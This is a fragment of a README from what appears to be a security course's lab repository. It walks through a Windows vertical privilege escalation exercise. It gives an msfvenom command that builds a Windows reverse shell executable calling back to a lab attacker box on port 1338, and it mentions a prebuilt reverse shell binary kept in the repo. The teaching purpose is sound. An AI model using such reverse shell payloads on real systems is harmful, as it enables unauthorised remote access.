wwt9829/csc840-securityfirst/README.md

 #### Vertical PrivEsc
 1. Get an administrator shell by following the steps in [Horizontal PrivEsc Exploitation](#Horizontal-PrivEsc-via-Unquoted-Service-Path).
 2. Create another simple TCP reverse shell with `msfvenom` on the Linux Exercises box, but it listens on a different port and can use any file name:
+      * There is a preconfigured binary with the IP address of the Linux Exercises box and name `Service2.exe` in the Windows PrivEsc folder in the repo.
+It connects to port 1338.

 ```
 msfvenom -p windows/shell_reverse_tcp LHOST=<IP address of Linux Exercises box> LPORT=1338 -f exe -o [Filename].exe